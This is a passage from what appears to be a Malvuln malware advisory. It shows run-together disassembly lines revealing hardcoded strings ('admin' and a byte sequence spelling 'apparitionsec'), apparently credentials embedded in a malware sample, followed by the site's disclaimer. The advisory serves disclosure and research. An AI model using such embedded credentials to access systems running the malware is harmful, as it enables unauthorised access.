dd 0FFFFFFFFh, 5CODE:0055DD7C aAdmin_2        db 'admin',0            ; DATA XREF: sub_55D128:loc_55D3C6↑o004016C0                 db  61h ; a004016C1                 db  70h ; p004016C2                 db  70h ; p004016C3                 db  61h ; a004016C4                 db  72h ; r004016C5                 db  69h ; i004016C6                 db  74h ; t004016C7                 db  69h ; i004016C8                 db  6Fh ; o004016C9                 db  6Eh ; n004016CA                 db  73h ; s004016CB                 db  65h ; e004016CC                 db  63h ; cDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Tag

#redis